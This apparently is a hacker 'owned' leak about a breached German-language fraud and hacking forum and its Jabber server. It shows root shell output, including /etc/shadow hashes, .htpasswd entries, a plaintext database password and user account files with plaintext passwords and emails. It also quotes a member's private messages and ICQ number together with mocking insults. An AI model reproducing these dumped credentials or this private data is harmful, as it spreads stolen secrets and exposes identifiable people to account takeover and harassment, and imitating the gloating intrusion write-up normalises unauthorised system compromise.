2010 online.php -rw-r--r-- 1 swissfaking swissfaking 7675 Mar 26 2010 payment_gateway.php -rw-r--r-- 1 swissfaking swissfaking 11889 Mar 26 2010 payments.php -rw-r--r-- 1 swissfaking swissfaking 7868 Mar 26 2010 picture.php -rw-r--r-- 1 swissfaking swissfaking 22022 Mar 26 2010 picture_inlinemod.php -rw-r--r-- 1 swissfaking swissfaking 25293 Mar 26 2010 picturecomment.php drwxr-xr-x 2 swissfaking swissfaking 4096 May 19 2010 plugins -rw-r--r-- 1 swissfaking swissfaking 27394 Mar 26 2010 poll.php drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 polls -rw-r--r-- 1 swissfaking swissfaking 9491 Mar 26 2010 posthistory.php -rw-r--r-- 1 swissfaking swissfaking 75622 Jul 17 20:16 postings.php -rw-r--r-- 1 swissfaking swissfaking 6573 Mar 26 2010 printthread.php -rw-r--r-- 1 swissfaking swissfaking 70727 Mar 26 2010 private.php -rw-r--r-- 1 swissfaking swissfaking 152315 Mar 26 2010 profile.php -rw-r--r-- 1 swissfaking swissfaking 555 Mar 26 2010 quickpreview.php -rw-r--r-- 1 swissfaking swissfaking 39730 Mar 26 2010 register.php -rw-r--r-- 1 swissfaking swissfaking 5667 Mar 26 2010 report.php -rw-r--r-- 1 swissfaking swissfaking 13699 Mar 26 2010 reputation.php drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 30 01:07 runnerzzzmod -rw-r--r-- 1 swissfaking swissfaking 128640 May 6 2010 search.php -rw-r--r-- 1 swissfaking swissfaking 20673 Mar 26 2010 sendmessage.php -rw-r--r-- 1 swissfaking swissfaking 9988 Mar 26 2010 showgroups.php -rw-r--r-- 1 swissfaking swissfaking 11353 Mar 26 2010 showpost.php -rw-r--r-- 1 swissfaking swissfaking 73449 Mar 26 2010 showthread.php drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 signaturepics -rw-r--r-- 1 swissfaking swissfaking 47803 Mar 26 2010 statistics__blocked_.php drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 statsmod___blocked_ -rw-r--r-- 1 swissfaking swissfaking 32827 Mar 26 2010 subscription.php -rw-r--r-- 1 swissfaking swissfaking 2091 Mar 26 2010 swisss.php -rw-r--r-- 1 swissfaking swissfaking 13344 Mar 26 2010 tags.php -rw-r--r-- 1 swissfaking swissfaking 8671 Mar 26 2010 threadrate.php -rw-r--r-- 1 swissfaking swissfaking 12394 Mar 26 2010 threadtag.php -rw-r--r-- 1 swissfaking swissfaking 34494 Mar 26 2010 usercp.php -rw-r--r-- 1 swissfaking swissfaking 19077 Mar 26 2010 usernote.php -rw-r--r-- 1 swissfaking swissfaking 27339 Mar 26 2010 visitormessage.php drwxr-xr-x 5 swissfaking swissfaking 4096 Mar 26 2010 vmoods drwxr-xr-x 13 swissfaking swissfaking 4096 Mar 26 2010 zseries_red drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 zxpwmvprzzugrzms # cat includes/config.php require valid-user 1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. # cd zxpwmvprzzugrzms && ls -la total 2068 drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 . drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. -rw-r--r-- 1 swissfaking swissfaking 495 Jan 3 22:38 .htaccess -rw-r--r-- 1 swissfaking swissfaking 26 Jan 3 22:38 .htpasswd -rw-r--r-- 1 swissfaking swissfaking 19317 Jan 3 22:52 accessmask.php -rw-r--r-- 1 swissfaking swissfaking 39558 Jan 3 22:52 admincalendar.php -rw-r--r-- 1 swissfaking swissfaking 49620 Jan 3 22:52 admininfraction.php -rw-r--r-- 1 swissfaking swissfaking 19126 Jan 3 22:52 adminlog.php -rw-r--r-- 1 swissfaking swissfaking 8125 Jan 3 22:52 adminpermissions.php -rw-r--r-- 1 swissfaking swissfaking 25492 Jan 3 22:52 adminreputation.php -rw-r--r-- 1 swissfaking swissfaking 32824 Jan 3 22:52 album.php -rw-r--r-- 1 swissfaking swissfaking 12980 Jan 3 22:52 announcement.php -rw-r--r-- 1 swissfaking swissfaking 54994 Jan 3 22:52 attachment.php -rw-r--r-- 1 swissfaking swissfaking 12488 Jan 3 22:52 attachmentpermission.php -rw-r--r-- 1 swissfaking swissfaking 19331 Jan 3 22:52 avatar.php -rw-r--r-- 1 swissfaking swissfaking 16437 Jan 3 22:52 bbcode.php -rw-r--r-- 1 swissfaking swissfaking 14758 Jan 3 22:51 bookmarksite.php -rw-r--r-- 1 swissfaking swissfaking 12059 Jan 3 22:51 calendarpermission.php -rw-r--r-- 1 swissfaking swissfaking 43 Jan 3 22:51 clear.gif drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 3 22:53 control_examples -rw-r--r-- 1 swissfaking swissfaking 65076 Jan 3 22:51 credits_admin.php -rw-r--r-- 1 swissfaking swissfaking 24025 Jan 3 22:51 cronadmin.php -rw-r--r-- 1 swissfaking swissfaking 10710 Jan 3 22:51 cronlog.php -rw-r--r-- 1 swissfaking swissfaking 34063 Jan 3 22:51 css.php -rw-r--r-- 1 swissfaking swissfaking 21795 Jan 3 22:51 diagnostic.php -rw-r--r-- 1 swissfaking swissfaking 11724 Jan 3 22:51 email.php -rw-r--r-- 1 swissfaking swissfaking 17458 Jan 3 22:51 faq.php -rw-r--r-- 1 swissfaking swissfaking 12143 Jan 3 22:51 force_read_thread.php -rw-r--r-- 1 swissfaking swissfaking 30113 Jan 3 22:51 forum.php -rw-r--r-- 1 swissfaking swissfaking 30039 Jan 3 22:51 forumpermission.php -rw-r--r-- 1 swissfaking swissfaking 7692 Jan 3 22:51 global.php -rw-r--r-- 1 swissfaking swissfaking 25898 Jan 3 22:51 help.php -rw-r--r-- 1 swissfaking swissfaking 51895 Jan 3 22:51 image.php -rw-r--r-- 1 swissfaking swissfaking 45450 Jan 3 22:51 index.php -rw-r--r-- 1 swissfaking swissfaking 8756 Jan 3 22:51 infernoshoutlog.php -rw-r--r-- 1 swissfaking swissfaking 3251 Jan 3 22:50 itrader_misc.php -rw-r--r-- 1 swissfaking swissfaking 37384 Jan 3 22:50 language.php -rw-r--r-- 1 swissfaking swissfaking 51623 Jan 3 22:50 mgc_cb_evo.php -rw-r--r-- 1 swissfaking swissfaking 69534 Jan 3 22:50 misc.php -rw-r--r-- 1 swissfaking swissfaking 34140 Jan 3 22:50 moderator.php -rw-r--r-- 1 swissfaking swissfaking 16889 Jan 3 22:50 modlog.php -rw-r--r-- 1 swissfaking swissfaking 1837 Jan 3 22:50 newsproxy.php -rw-r--r-- 1 swissfaking swissfaking 30631 Jan 3 22:50 notice.php -rw-r--r-- 1 swissfaking swissfaking 43202 Jan 3 22:50 options.php -rw-r--r-- 1 swissfaking swissfaking 12026 Jan 3 22:50 passwordcheck.php -rw-r--r-- 1 swissfaking swissfaking 62644 Jan 3 22:50 phrase.php -rw-r--r-- 1 swissfaking swissfaking 85854 Jan 3 22:50 plugin.php -rw-r--r-- 1 swissfaking swissfaking 33055 Jan 3 22:50 prefix.php -rw-r--r-- 1 swissfaking swissfaking 49757 Jan 3 22:50 profilefield.php -rw-r--r-- 1 swissfaking swissfaking 11300 Jan 3 22:49 ranks.php -rw-r--r-- 1 swissfaking swissfaking 5696 Jan 3 22:49 read_pms_deu.php -rw-r--r-- 1 swissfaking swissfaking 15668 Jan 3 22:49 replacement.php -rw-r--r-- 1 swissfaking swissfaking 11004 Jan 3 22:49 resources.php -rw-r--r-- 1 swissfaking swissfaking 30488 Jan 3 22:49 ripper.php -rw-r--r-- 1 swissfaking swissfaking 20657 Jan 3 22:49 rssposter.php -rw-r--r-- 1 swissfaking swissfaking 13164 Jan 3 22:49 socialgroup_icon.php -rw-r--r-- 1 swissfaking swissfaking 17538 Jan 3 22:49 socialgroups.php -rw-r--r-- 1 swissfaking swissfaking 11215 Jan 3 22:49 stamp.php -rw-r--r-- 1 swissfaking swissfaking 8623 Jan 3 22:49 stats.php -rw-r--r-- 1 swissfaking swissfaking 8170 Jan 3 22:49 subscriptionpermission.php -rw-r--r-- 1 swissfaking swissfaking 62261 Jan 3 22:49 subscriptions.php -rw-r--r-- 1 swissfaking swissfaking 91677 Jan 3 22:49 template.php -rw-r--r-- 1 swissfaking swissfaking 3911 Jan 3 22:49 textarea.php -rw-r--r-- 1 swissfaking swissfaking 58666 Jan 3 22:49 thread.php -rw-r--r-- 1 swissfaking swissfaking 8300 Jan 3 22:49 threadfields_admin.php -rw-r--r-- 1 swissfaking swissfaking 95176 Jan 3 22:48 user.php -rw-r--r-- 1 swissfaking swissfaking 56136 Jan 3 22:48 usergroup.php -rw-r--r-- 1 swissfaking swissfaking 7272 Jan 3 22:48 usertitle.php -rw-r--r-- 1 swissfaking swissfaking 75581 Jan 3 22:48 usertools.php -rw-r--r-- 1 swissfaking swissfaking 18753 Jan 3 22:48 verify.php # cat .htpasswd Fickmaus:9Zistd9IicJdY # cd ../jabber && ls -la total 684 drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 . drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. -rw-r--r-- 1 swissfaking swissfaking 7948 Oct 10 18:54 AC_OETags.js -rw-r--r-- 1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf -rw-r--r-- 1 swissfaking swissfaking 4286 Oct 10 19:10 favicon.gif -rw-r--r-- 1 swissfaking swissfaking 3638 Oct 10 18:54 favicon.ico -rw-r--r-- 1 swissfaking swissfaking 1272 Oct 10 18:54 history.htm -rw-r--r-- 1 swissfaking swissfaking 1292 Oct 10 18:54 history.js -rw-r--r-- 1 swissfaking swissfaking 2656 Oct 10 18:54 history.swf -rw-r--r-- 1 swissfaking swissfaking 15260 Oct 10 19:11 jabber.html -rw-r--r-- 1 swissfaking swissfaking 2518 Oct 10 18:55 osxmousewheel.js -rw-r--r-- 1 swissfaking swissfaking 657 Oct 10 18:55 playerProductInstall.swf While looking through the forums we came across someone special... ________________________________________________________________________ From fred777 to Fickmaus; Subject: Mod? Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen ob ihr Unterstützung benötigt, bzw. ich würde gerne meine Hilfe anbieten.. Designen, moderieren etc. Als Moderator würde ich wenn dann gerne die Sections: Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch gar keine, ich dachte nur für einen guten Start ist das nicht schlecht. Selbstverständlich werde ich auch noch einiges posten Falls ihr mich nicht kennt, schaut mal auf fred777.5x.to, free-hack, back2hack etc. vorbei ;) Danke ________________________________________________________________________ From fred777 to SzeneCrasher; Subject: Hi Crasher Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich der Hacking/Coding Section. Ich würde die gerne moderieren und euch helfen. Das ich kein Mist mache solltest du wissen, bin schon lange im Netz unterwegs, FH,Back2hack etc.. Solltest du Fragen haben: ICQ 390271540 Vielleicht wird das ja was, danke schonmal ________________________________________________________________________ From fred777 to erdnuss; Subject: Mod? Ja, da nun ja auch Sections geändert worden sind und es voller wird, wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren in der Security/Hacking Sections. Habe auch schon letztens Ficki gefragt, der meinte abwarten... Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde gerne Moderator in dieser Section werden, darum die Frage. Kennen könnte man mich von Back2hack und Freehack ;) ________________________________________________________________________ From fred777 to SzeneCrasher; Subject: Frage Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht, Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine komplette Bewerbung abschicken wenn ihr welche sucht. ________________________________________________________________________ From fred777 to SzeneCrasher; Subject: Aussichten Ja ich wollte mal fragen, wie es so steht, bezüglich der Moderatorenanfrage und was die anderem Teamies gesagt haben.. Gruß _fred_ ________________________________________________________________________ FUCK. Are you serious? We knew you're lame. We knew you're dying for fame and we even knew you suck cock but we were absolutely not aware of the extent this has come to. Are you really that desperate to moderate a fucking preschool that you start begging for it only days after your registration? Damnit fred, you're pretty rundown. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | From fred777 to Fickmaus; Subject: Jabber | | Ja ich hätte gerne einen Account, habe noch keinen. | | Name: fred777 | |____________________________________________________________________| Right on cue, chap! Not only is the board full of criminal kids, but they also provide a jabber server for their users. While at it, we decided to tap in and see what they're doing there, we also got some loggin going and prepared a nice collection of their messages as well as a full backup for you. # uname -a Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux # id uid=0(root) gid=0(root) # cat /etc/passwd /etc/shadow root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh bind:x:101:104::/var/cache/bind:/bin/false fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin stunnel4:x:104:106::/var/run/stunnel4:/bin/false smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false jabber:x:107:65534::/var/run/jabber:/bin/false messagebus:x:108:109::/var/run/dbus:/bin/false avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash identd:x:111:65534::/var/run/identd:/bin/false openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7::: daemon:*:14725:0:99999:7::: bin:*:14725:0:99999:7::: sys:*:14725:0:99999:7::: sync:*:14725:0:99999:7::: games:*:14725:0:99999:7::: man:*:14725:0:99999:7::: lp:*:14725:0:99999:7::: mail:*:14725:0:99999:7::: news:*:14725:0:99999:7::: uucp:*:14725:0:99999:7::: proxy:*:14725:0:99999:7::: www-data:*:14725:0:99999:7::: backup:*:14725:0:99999:7::: list:*:14725:0:99999:7::: irc:*:14725:0:99999:7::: gnats:*:14725:0:99999:7::: nobody:*:14725:0:99999:7::: libuuid:!:14725:0:99999:7::: bind:*:14725:0:99999:7::: fetchmail:*:14725:0:99999:7::: sshd:*:14725:0:99999:7::: stunnel4:!:14725:0:99999:7::: smmta:*:14725:0:99999:7::: smmsp:*:14725:0:99999:7::: jabber:*:14817:0:99999:7::: messagebus:*:14829:0:99999:7::: avahi:*:14829:0:99999:7::: postgres:*:14829:0:99999:7::: identd:*:14829:0:99999:7::: openfire:*:14829:0:99999:7::: # cd /root && ls -la total 36 drwxr-xr-x 3 root root 4096 Jan 3 01:45 . drwxr-xr-x 20 root root 4096 Dec 30 13:30 .. -rw------- 1 root root 5215 Sep 27 21:42 .bash_history -rw-r--r-- 1 root root 412 Dec 16 2004 .bashrc -rw-r--r-- 1 root root 140 Nov 19 2007 .profile drwx------ 2 root root 4096 Jan 3 00:35 .ssh -rw------- 1 root root 6186 Jan 3 01:45 .viminfo # cat .bash_history cd etc ls -l cd jabber ls -l vi jabber.xml ls -l vi jabber.cfg cd .. ls -l cd .. ls -l cd jabberd/jabber-1.4.2a ls -l cd var cd run ls -l cd jabber ls -l ls -l cd .. ls -l cd etc cd jabber ls -l Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz ls -l gzip -d mu-conference-0.6.0.tar.gz ls -l tar -xvf mu-conference-0.6.0.tar ls -l cd mu-conference-0.6.0 ls -l make Makefile ls -l ps aux cd src ls -l cd .. ls -l cd scripts ls -l cd .. ls -l cd ./ ls -l cd .. ls -l vi jabber.xml cd mu-conference-0.6.0 ls -l make cd src ls -l make cd .. cd .. cd .. cd .. ls -l cd /etc/jabber ls -l del mu-conference-0.6.0.tar rmdir mu-conference-0.6.0 mu-conference-0.6.0 rmdir -p mu-conference-0.6.0 rmdir --ignore-fail-on-non-empty mu-conference-0.6.0 ls -l rmdir --help rmdir --ignore mu-conference-0.6.0 ls -l rmdir -i mu-conference-0.6.0 rm mu-conference-0.6.0.tar ls -l rm mu-conference-0.6.0 rm -r mu-conference-0.6.0 ls -l cd .. cd .. cd .. ls -l wget http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz ls -l gzip -d mu-conference_0.8.tar.gz ls -l tar -xvf mu-conference_0.8.tar ls -l cd mu-conference_0.8 ls -l make ls -l cd scr ls -l cd src ls -l make ls -l cd .. cd .. ls -l rm mu-conference_0.8.tar rm -r mu-conference_0.8 ls -l wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz gzip -d jabberd-1.4.4.tar.gz tar -xvf gzip -d jabberd-1.4.4.tar ls -l tar -xvf jabberd-1.4.4.tar ls -l cd jabberd-1.4.4 ls -l ./configure make ls -l cd .. ls -l rm jabberd-1.4.4.tar rm -r jabberd-1.4.4 ls -l cd etc cd jabber ls -l vi jabber.d cd jabber.d ls -l cd .. cd .. cd .. ls -l cd var cd run ls -l cd jabber ls -l wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz ls -l gzip -d jud-0.4.tar.gz tar -xvf jud-0.4.tar ls -l cd jud-0.4 ls -l make cd .. ls -l rm jud-0.4.tar rm -r jud-0.4 ls -l ls -l cd .. ls -l cd var cd run cd jabber ls -l ps aux cd .. cd .. ls -l cd .. ls -l cd etc ls -l cd jabber ls -l vi jabber-muc.xml ps aux cd .. cd .. cd var cd run cd jabber ls -l su jabber ls -l ps aux cd .. cd .. ls -l cd etc cd .. ls -l cd etc cd jabber ls -l vi jabber.xml cd .. ls -l cd jabber ls -l cd .. cd init.d ls -l cd jabber cd .. ls -l cd .. cd usr cd lib ls -l cd jabber ls -l cd mu-conference ls -l cd .. cd .. cd.. cd .. cd .. cd etc cd jabber ls -l vi jabber.xml vi jabber-muc.xml jabber-muc cd .. ls -l cd default ls -l jabber-muc cd jabber-muc jabber-muc cd jabber-muc exec jabber-muc cd .. cd .. cd var cd spool ls -l cd .. cd .. ls -l cd etc cd jabber ls -l vi jabber-muc.xml ps aux cd .. ls -l cd etc cd jabber ls -l vi jabber-muc.xml vi jabber-jud.xml vi jabber.xml cd .. cd etc cd jabber ls -l vi jabber.xml ps aux cd .. cd .. cd usr ls -l cd lib ls -l cd jabber ls -l cd mu-conference ls -l cd .. cd .. cd .. cd .. cd etc ls -l cd jabber ls -l vi vi jabber.xml ps aux kill 26124 ls -l ps aux cd .. cd .. cd usr cd sbin ls -l jabberd -h jabber-swissfaking.net cd .. cd .. cd etc ls -l cd jabber ls -l vi jabber.xml cd .. cd .. cd usr cd sbin jabberd -h jabber-swissfaking.net ps aux netstat -tlun cd .. cd cd var ls -l cd var cd run cd jabber ls -l cd .. cd .. ls -l cd .. ls -l cd usr cd sbin ls -l jabber-muc jabberd -much jabber-swissfaking.net cd .. cd etc cd jabber ls -l vi jabber.xml vi jabber.cfg cd.. cd .. cd .. cd var cd lib cd jabber ls -l cd .. cd .. cd var cd var cd .. cd var cd run cd jabber ls -l ps aux kill 3184 jabberd -h jabber-swissfaking.net cd .. ls-l ls -l cd etc cd jabber ls -l vi jabber-muc.xml vi jabber-jud.xml cd .. default cd default vi jabber-muc cd .. cd jabber ls -l vi jabber.xml netstat -tlun cd .. cd .. cd var cd run cd jabber ps aux kill 18354 jabberd -h jabber-swissfaking.net cd.. cd .. cd etc cd jabber ls -l cd jabber.d ls -l jabber-jud jabber-jud -h cd jabber-jud jabber-jud jabber-jud -h jabber-swissfaking.net cd .. cd . cd .. cd .. cd var cd spool ls -l cd .. cd .. ps aux cd /usr/lib/jvm/ja cd usr cd .. cd usr cd lib cd ... cd .. cd .. cd etc ls -l cd init.d ls -l openfire restart openfire restart cd openfir openfire stop sudo /etc/init.d/openfire restart ls -l cd .. cd /usr/share/openfire ls -l cd lib ls -l ps aux cd /usr/sbin/jabberd cd /usr/sbin/jabberd cd /usr/sbin/ ls -l ps aux kill 7313 ps aux sudo /etc/init.d/openfire restart cd .. ps aux kill 13651 sudo /etc/init.d/openfire restart ps aux ps aux ps aux ps aux ps aux ps aux sudo /etc/init.d/openfire start ps aux cd .. ls -l ps aux sudo /etc/init.d/openfire restart ps aux ps aux ps aux kill 13754 ps aux ps aux sudo /etc/init.d/openfire restart ps aux kill 26588 sudo /etc/init.d/openfire restart cd .. ls - ls -l cd etc ls -l cd jabber ls -l del rm jabber.xml rm jabber.d rm jabber.cfg rm jabber-muc.xml rm jabber-jud.xml ls -l cd jabber.d ls -l rm jabber-jud rm jabber-muc ls -l cd .. ls -l rmdir jabber.d ls -l cd .. ls -l cd .. cd var cd run ls -l rm jabber cd jabber ls -l cd .. ls -l cd .. ls -l cd ls -l cd .. ls -l ps aux cd.. cd .. ls -l ps aux sudo /etc/init.d/openfire restart cd .. ps-aux ps aux sudo /etc/init.d/openfire restart ps aux cd .. ps aux sudo /etc/init.d/openfire restart cd .. ps aux sudo /etc/init.d/openfire restart sensor # ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1980 688 ? Ss 2010 0:05 init [2] openfire 1703 0.0 25.0 342352 131124 ? Sl Jan03 4:30 /usr/lib/jvm/java-6-sun/bin/java -server -DopenfireHome=/usr/share/openfire -Dopenfire.lib.dir=/usr/share/openfire/lib -classpath /usr/share/openfire/lib/startup.jar -jar /us root 3392 0.0 0.1 1692 616 ? Ss 2010 0:00 /sbin/syslogd 108 3399 0.0 0.1 2480 860 ? Ss 2010 0:00 /usr/bin/dbus-daemon --system avahi 3410 0.0 0.2 2876 1432 ? Ss 2010 0:00 avahi-daemon: running [jabbersw.local] avahi 3411 0.0 0.0 2744 452 ? Ss 2010 0:00 avahi-daemon: chroot helper root 3417 0.0 0.1 5272 1032 ? Ss 2010 0:00 /usr/sbin/sshd www-data 3632 0.0 1.1 38240 6232 ? S Jan02 0:00 /usr/sbin/apache2 -k start postgres 3750 0.0 0.9 40668 4960 ? S 2010 0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf postgres 5193 0.0 1.2 40668 6540 ? Ss 2010 0:04 postgres: writer process postgres 5194 0.0 0.2 40668 1288 ? Ss 2010 0:02 postgres: wal writer process postgres 5195 0.0 0.2 40808 1424 ? Ss 2010 0:01 postgres: autovacuum launcher process postgres 5196 0.0 0.2 11988 1192 ? Ss 2010 0:05 postgres: stats collector process root 5230 0.0 0.1 108572 940 ? Ssl 2010 0:00 /usr/sbin/nscd root 5262 0.0 0.1 2912 820 ? Ss 2010 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6 root 5279 0.0 0.1 2036 688 ? Ss 2010 0:00 /usr/sbin/cron root 5430 0.0 2.3 37740 12556 ? Ss 2010 0:00 /usr/sbin/apache2 -k start postgres 7792 0.0 1.2 41992 6744 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43823) idle postgres 7801 0.0 1.1 41916 6044 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43824) idle postgres 7802 0.0 1.2 41980 6300 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43825) idle postgres 7803 0.0 1.2 41976 6296 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43826) idle postgres 13420 0.0 1.2 41988 6720 ? Ss 00:53 0:01 postgres: openfire openfire 127.0.0.1(43907) idle www-data 17911 0.0 1.1 38236 6220 ? S Jan03 0:00 /usr/sbin/apache2 -k start root 22036 0.0 0.1 2296 776 pts/0 R+ 07:10 0:00 ps aux www-data 26577 0.0 1.1 38240 6236 ? S Jan02 0:00 /usr/sbin/apache2 -k start root 30105 0.0 0.2 2760 1408 pts/0 Ss 07:04 0:00 -bash # cd /usr/share/openfire && ls -la total 20 drwxr-x--- 5 openfire openfire 4096 Jan 3 00:49 . drwxr-xr-x 114 root root 4096 Aug 9 02:02 .. lrwxrwxrwx 1 openfire openfire 13 Aug 9 02:02 conf -> /etc/openfire lrwxrwxrwx 1 openfire openfire 29 Aug 9 02:02 embedded-db -> /var/lib/openfire/embedded-db drwxr-x--- 2 openfire openfire 4096 Aug 9 02:02 lib lrwxrwxrwx 1 openfire openfire 17 Aug 9 02:02 logs -> /var/log/openfire drwxr-xr-x 3 openfire openfire 4096 Jan 3 00:49 monitoring lrwxrwxrwx 1 openfire openfire 25 Aug 9 02:02 plugins -> /var/lib/openfire/plugins drwxr-x--- 3 openfire openfire 4096 Aug 9 02:02 resources # cd conf && ls -la total 32 drwxr-x--- 3 openfire openfire 4096 Jan 6 16:40 . drwxr-xr-x 84 root root 4096 Jan 3 01:45 .. -rw-r--r-- 1 openfire openfire 9403 Jan 6 16:40 available-plugins.xml -rw-r--r-- 1 openfire openfire 1876 Jan 3 00:51 openfire.xml drwxr-x--- 2 openfire openfire 4096 Jan 3 01:31 security -rw-r--r-- 1 openfire openfire 11 Jan 6 16:40 server-update.xml # cat openfire.xml 9618 9619 de org.jivesoftware.database.DefaultConnectionProvider org.postgresql.Driver jdbc:postgresql://localhost:5432/openfire openfire pass123 select 1 true true 5 25 1.0 true false # cd /var/lib/jabber && ls -la total 12 drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 . drwxr-xr-x 27 root root 4096 Aug 9 02:02 .. drwx------ 2 root root 4096 Aug 9 01:34 jabber-swissfaking.net # cd jabber-swissfaking.net && ls -la total 192 drwx------ 2 root root 4096 Aug 9 01:34 . drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 .. -rw------- 1 root root 1332 Aug 4 16:46 afroman.xml -rw------- 1 root root 1387 Aug 8 15:38 babypanda.xml -rw------- 1 root root 411 Aug 4 00:03 basics.xml -rw------- 1 root root 976 Aug 3 15:31 batonde.xml -rw------- 1 root root 9717 Aug 8 21:56 bullddoser.xml -rw------- 1 root root 845 Aug 3 17:44 cr4ck.xml -rw------- 1 root root 9791 Aug 8 15:16 crankz.xml -rw------- 1 root root 391 Aug 3 15:43 cryten.xml -rw------- 1 root root 906 Aug 7 19:39 darkfunny.xml -rw------- 1 root root 596 Aug 8 17:47 dotsyn.xml -rw------- 1 root root 564 Aug 4 16:47 el!t3.xml -rw------- 1 root root 2177 Aug 8 23:08 fickmaus.xml -rw------- 1 root root 391 Aug 4 23:26 flash.xml -rw------- 1 root root 1428 Aug 5 16:17 freakout.xml -rw------- 1 root root 1201 Aug 8 23:20 glycerin\40jabber-swissfaking.net.xml -rw------- 1 root root 787 Aug 4 14:37 hackthenet.xml -rw------- 1 root root 1300 Aug 5 16:17 hans-wurst.xml -rw------- 1 root root 390 Aug 5 00:59 holzmen.xml -rw------- 1 root root 636 Aug 7 23:25 jamyla\40jabber-swissfaking.net.xml -rw------- 1 root root 393 Jul 30 22:10 kappy777.xml -rw------- 1 root root 392 Aug 5 15:38 kluless.xml -rw------- 1 root root 424 Aug 9 00:55 luigi100.xml -rw------- 1 root root 794 Aug 8 15:39 naik.xml -rw------- 1 root root 390 Aug 8 16:36 nitex.xml -rw------- 1 root root 699 Aug 8 22:16 racketeer.xml -rw------- 1 root root 992 Aug 5 16:17 s0xtech.xml -rw------- 1 root root 392 Aug 3 23:16 sinned.xml -rw------- 1 root root 20723 Aug 5 16:27 st3ffl0r.xml -rw------- 1 root root 2325 Aug 8 03:49 syntax\40jabber-swissfaking.net.xml -rw------- 1 root root 645 Aug 9 01:12 syntex.xml -rw------- 1 root root 724 Aug 8 15:39 theird21.xml -rw------- 1 root root 1754 Aug 8 15:38 the|biggie.xml -rw------- 1 root root 1764 Aug 9 01:34 trickz.xml -rw------- 1 root root 409 Aug 3 20:22 w!cked.xml -rw------- 1 root root 396 Aug 8 03:12 w00dka.xml -rw------- 1 root root 1324 Aug 5 05:06 weareone.xml -rw------- 1 root root 547 Aug 8 18:22 yaboybigt.xml # for file in *; do echo $file; cat $file; echo -e "\n"; done afroman.xml JGMlms91afromanregisteredFriendsFriendsFriendsFriends babypanda.xml BTYM8hbabypandaBabyPandaregisteredDisconnectedFriendsFriendsFriendsFriends basics.xml nicki123!basicsregisteredDisconnected batonde.xml 1asdfghjklbatonderegistered\roster:delimiterReplaced by new connectionbatonde<ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> bullddoser.xml <xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' 